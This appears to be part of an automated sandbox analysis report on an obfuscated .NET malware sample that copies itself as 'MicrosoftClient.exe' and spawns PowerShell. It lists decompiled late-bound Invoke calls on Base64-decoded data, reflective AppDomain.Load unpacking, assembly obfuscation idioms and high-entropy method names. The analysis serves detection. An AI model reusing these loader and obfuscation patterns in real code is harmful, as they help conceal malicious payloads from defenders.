Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.Ux0hBpfswygkfwIAaDV2LgRcw3hXBRS3geLIglSv,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cad9pd9UPvHp11geHOoKHnvh8Jb4VnBCf0GQ2wIg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.R3QwhNyok9sKs1bcp9YKhGlPL4LSqJ7wM4wt8ROg,_01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.wLZzW8rYyNJoZccerS4YJsbfYv62GWnDm7InJplR,NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.HKkbHp8Ip0osbW5qkheNNa6i0pKHRJ2esR5cWRft8ZL7HGZP9zH1FAFnry()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{UtSwHbP8M24sTP6TQWiCOVnJW[2],NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.ZL3IIKzRyFMNczhjFRLJp7P5RRSngAHZDp4TR8tLjqeHYAiAGPLIEWWWEh(Convert.FromBase64String(UtSwHbP8M24sTP6TQWiCOVnJW[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { UtSwHbP8M24sTP6TQWiCOVnJW[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: hi8i65wpblvGWk5oXoxjBQ3BH System.AppDomain.Load(byte[])
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY System.AppDomain.Load(byte[])
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	.Net Code: Q9w40NAKVylkpLnEtwd22aJdY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Code function: 0_2_00007FFD343D00BD pushad ; iretd	0_2_00007FFD343D00C1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Code function: 0_2_00007FFD343D8908 push E95D0F61h; ret	0_2_00007FFD343D8929
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD342ED2A5 pushad ; iretd	2_2_00007FFD342ED2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD344000BD pushad ; iretd	2_2_00007FFD344000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD344D2316 push 8B485F91h; iretd	2_2_00007FFD344D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD342CD2A5 pushad ; iretd	5_2_00007FFD342CD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E00BD pushad ; iretd	5_2_00007FFD343E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD344B2316 push 8B485F93h; iretd	5_2_00007FFD344B231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD342BD2A5 pushad ; iretd	8_2_00007FFD342BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343D00BD pushad ; iretd	8_2_00007FFD343D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343D19D2 pushad ; ret	8_2_00007FFD343D19E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD344A2316 push 8B485F94h; iretd	8_2_00007FFD344A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD342BD2A5 pushad ; iretd	11_2_00007FFD342BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343D00BD pushad ; iretd	11_2_00007FFD343D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD344A2316 push 8B485F94h; iretd	11_2_00007FFD344A231B
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Code function: 13_2_00007FFD344000BD pushad ; iretd	13_2_00007FFD344000C1
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Code function: 14_2_00007FFD343E00BD pushad ; iretd	14_2_00007FFD343E00C1

Source: 9RgE5uOJwX.exe, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs	High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
Source: 9RgE5uOJwX.exe, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: 9RgE5uOJwX.exe, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: 9RgE5uOJwX.exe, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs	High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: 9RgE5uOJwX.exe, YIsiQT0bVRZkgJBchQD3mj8TT.cs	High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: 9RgE5uOJwX.exe, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: 9RgE5uOJwX.exe, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: 9RgE5uOJwX.exe, a5vqhNcXHqNHEz8q3VSMya6o4.cs	High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
Source: MicrosoftClient.exe.0.dr, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs	High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
Source: MicrosoftClient.exe.0.dr, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	High entropy of concatenated method names: 'jhqnO08Zvk17ev11zCn1tDNyTKV4wrZCE3H2RZPlHLutZ98jo9', 'V9mLFi4rb3GvXaL6EBDv0B8HJqs2WFhtPa3AH0lHf3A2pMXVYJ', 'GgcZLQqItYEUYNnNAZ4QKz0diL9fvAuCxQNymlrnZH4nl6sfyR', '_5nEc0S8xY9P4Ra53Ss7UIayp6ClaHO5HD3EtyBzzym99uzNybf'
Source: MicrosoftClient.exe.0.dr, CwgUWtA4EqaTAVKSuJbX5wXDfQHTFQ9u4KFXlf86FrRhdWOZZe4aaCgE6NOsP5wgybmILD80wDyjoLU0jDcqZlnSHBFP4AoybT.cs	High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'l7QqVOpv5orfSsK1rVePRY0QScELJRgtOU5S5qrR06ts0FGeXA', 'IMuVwxQ7PzQdOPdwzfvWABKRWs1TXTTNssoFw13dzaRdqhx3JW', 'k2S4f9gpgfpnL665tp9amMtsA5IoP9uFBFbPCgEiwTaSyeTujL', 'kH08bywJ8b6ETVolDtOEmOuJegDH2sdJ14AtxT8fI4GzS2JAOc'
Source: MicrosoftClient.exe.0.dr, LYQIWx0vxxudRlTzfQ0waGDKlqkAgcH7WUyA3eq2.cs	High entropy of concatenated method names: 'aN8VYkhc0BO34AMF7GwwtAcuEMi8gpLKT0sBVyiJ', 'KF4fWkhGpT0A9Qn818SJnpIJCk1h3stAQcgmNpxB', 'jurUB02cOltjuscD09WWl8F1Os4OJSMGfVHBLrPf', 'u84FUlA8UhiU1Ck0UM3rIdd33UupfVmcENg241d6', 'zBH2q54hjV8xSrFrXE0yEeezAvcde6pR0qEcNUvC', 'Bwlz4YPX68j6SXY3g8EzLyZdsBilO2ilgtMsNFpqHfzWZPH0a1', 'LIScEfY7zZ9tVLYhkj7NZv4T8GgZrwbYaZlOKmPS5UN5HtzRGw', 'zhEDKhI5fm3XXvX7PbMRWPVvQKbIr6tWMUXWD4O9XGBlJ5tM1k', 'YGjf4QSiliOhMxkLAfF03TDhmB4aoUPGEtgyXyGQcXsIlLdYy8', 'JXYPkt8Jc9cHWwIZQVgseSeK4KCbc9BiY7TP3WfRiFuFzwM61c'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	High entropy of concatenated method names: 'MIC0gXm6oQLdJJNexLAZ0VfQp7AyfIaMpbOVt0M1QQZEcmxA7Sf5L9YIUN', 'xoMoqlJJoBCpUws1UFZyAVxdCo4nimVTZ1HAmCp9FfNxYDh18rUDURGbfR', 'uGU04LhSc0DLfZmkwJ41N4uQxupxiuVB5cnzQc7zH1M4R7qywoQDKi0Uc2', 'D2lsPY8vIDAUmaZv38f94w3l14oWYBUSPfO4AlTvZi42FhqpK9xjwmtVdw', 'xLaib1dRWTsno2J1oeKLMQoDEOi7lPfX9wC4ifXlivIfTlYdbKKz1lGYnh', 'maoX0CbSzaK3Rp28VcoiQMu0Yd8lXEdqZ1n97iyuyV8mnHEWcdUtMo32aR', 'Ntyhb7069wrMlb0XmKNw1PHMTQNHhD7FeCZpkZTap14DxxYTvmwaFExi5G', 'ttrAVNH6YBCZfgmZxa3WCFElLj8U1ZNOWuqbF9YWTWc0wemzUYZCmtiKvT', 'oIjsldVLmBsoVjw0x6MU9ifVuMIypjsEe6oxIf0rF11lzjDqVoi4fiHyTd', '_55PjX53gU1NTJU3tah4lib8YBCex6SJjDcIdwVC9HxM9H8ap37s1hNQ2T5'
Source: MicrosoftClient.exe.0.dr, YIsiQT0bVRZkgJBchQD3mj8TT.cs	High entropy of concatenated method names: '_9EKA4mmYhS5A3Vo7PQ5U8yYpV', '_3F8KZvwIIllQlPE51Q7rT7NP6', '_2MK6IwXfT4BOrv9J3aXyidWkj', '_5T1TMhB3O7StVjktbLYkSdIZp', 'iuuUZwHDvSsobqzAj4G742AIvHkq8JAEWiL', 'DlrOYOIGTZV4eJpPtea5byCrFn4zM8nublj', '_9ILnQINVxIYDQ97TVIaa9YyCpB7EXAW5tom5Es3ncPJ1lS95RaMBwRsWQNgKYutlvNo', 'VXmJfTdoGixB1E5Z1wjgTOteiJOmc6KBc4xrCsqFVbJwXC1iznjrsa7UHQE2XigNpuH', '_5wNIasIaQNeaZwCIvHyKNM1SOqS7HX3huPu0AQBwPzVGiYotwHWJSytkXkzbO10a0u5', 'NqPA5cp23835Re9M2uVQVtMMUJvNAjSqvVFtg3TUx4mDFNPZ8gLyuQYAAKvkocPUew0'
Source: MicrosoftClient.exe.0.dr, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	High entropy of concatenated method names: 'BDRQ8CiLuswqAppJ4K91S5dh7YdvybCtM3VXEJxg8i33Ed3RgMAv6gmJro', '_2nTtKAoberzYJFa7yq1LShwR8iNGoNekJgkkYX6S1BcPCM8qgTL5QO4WVKcyQKvXUXx', 'CV9weyjNtLvDncWBpl6tyfl7rElfyAYbtml1wChTE2sQe7JYYGIUlJ6anqhPEQaqgxm', 'GmaE3jPyBngvX63rusAkRdVRn1ie9jYpnFfeg98CF9ox4G8MiFGJjJdguFMfwhYFN1T', '_5LiqLS0rriTlip5EnigTqlfbYT3O9Zqp992Vw5piCNSkIp7WEyJpSl0bNpEFgIiES8U'
Source: MicrosoftClient.exe.0.dr, fWqkE4ezX2E2mwZtGlvGPJxNf.cs	High entropy of concatenated method names: 'LRbYTeQD7H3jkFsPe9vpLFlDK', 'hi8i65wpblvGWk5oXoxjBQ3BH', 'l54elty1mfujUEGBMp1X01hln', 'wMGCYdFEkNKYe9j3GZMkOGgBb', '_7ufBfU62R4YZocKbpyUGXuknW', 'vXnHhVT57mZluAzRt80l5DsC6', 'Xyybo5TncnAaF1HAYGa0X7pSt', 'FjPS8U7KdFCmJBM975RiRSOwG', 'q0i2kZtvL6SyvbPYW8hbQYPfk', 'PDkuHMfS9HsSe85HDqEfRBcdl'
Source: MicrosoftClient.exe.0.dr, a5vqhNcXHqNHEz8q3VSMya6o4.cs	High entropy of concatenated method names: 'tcLVTujiwrEFL1XBqaq0Gkulh', '_6YDoJioH7lq3A9fcfwP6t5FusMNbaJDowzB', 'zY6zaLyg7utnR5pYiU0cNBx8deQoNVFn4FM', 'Rpmrt7znvurUSjgCFVpoXZqCBkQRHATCDfT', 'B6vwsK21WX1UISAfEue3xQtBL56Pan3z3w4'
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	High entropy of concatenated method names: '_3LFonnJfMRrLHdpajh1txoztqe85dV2AVPAe2ScC', 'A4Ca0fThPYuMM71E9HMZWq5tGxpad03yOTvETA0o', 'pcaW3zWDHX7MVjNus91u9hKz7', 'Jp9k7fXgQoYDxMbOc7uHDDsth', 'nWxxEIQKgRUY1dWWi3OQPdZ89', 'STGNxbu4HbCk1zVHeAiYEueIa', 'Qmu9tHeWTcvzanYgBmEpbSdxN', 'FpuhZCDsHlAP5KMW0BQMk5HSp', 'uCtfHWlMzsUBm2H6W1BOk8o0J', 'cMoLfn0A28VUYcraKWobh80Nc'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, i1P5h3Yf5OnQi96hdLePtGoWhHPkDOJ9r7kQ4YJe6VnvuDEoTVZTFpXOCE.cs	High entropy of concatenated method names: 'ahkLBtcIAydoos0eu62oegKUfAo0SL3L9OD9j2T3JLmGzukbiyeKgLjCSPKg4EYgBnIBxgYtCh0xAeXwNQlEbGdFkA', 'AGw2v2oTlbKKwP5x54MXxcVDYqGPGQpRJipwdHpXHBPAMHi11we4uShSDNBrFuQYexAzu229tcRWrDyimxgzbdEdn7', 'e8sRBQTSKmYnc600qDRn7HAtf9sdYePcpIyv99Zf7KCV6zwVt7RnAo8eGU2j4VbptR4g0yX4svG23wpswKCHRHf2El', 'G2vZaPROQB58OHc93Il4EOQ6qitlnHPGbfidlAllzOQqJ2sZ5skIm', 'WVUPcFQrakwet0BYu6RZOeDnQflzSLDp128QAwVFA2AyCfVhtUp5Y', 'Lk39O2yY6bC2uVjbl0usdQMVKri6n206tM5wIieecU7Hyvy43bY15', 'z1HABQCPwrT0YomXKTfqflk7r7iysVNf40rvYabHoqgiu8hMl5Uf7', 'UUzA3oHXZI6sx4VEhyLrPn3QHw84Px1L7j3ZqKyf05vdV3dBh1tsj', '_2PEvelOuIaYGA3OZocilsXC0IPXEKv3yr4BL6LRL6tZ5PfEKN4cTV', 'JgxDH0Jzmif2muKohDfTiZUT1Ls0cCaHTxkK9yDyY7Vc7wiCfZ7cR'
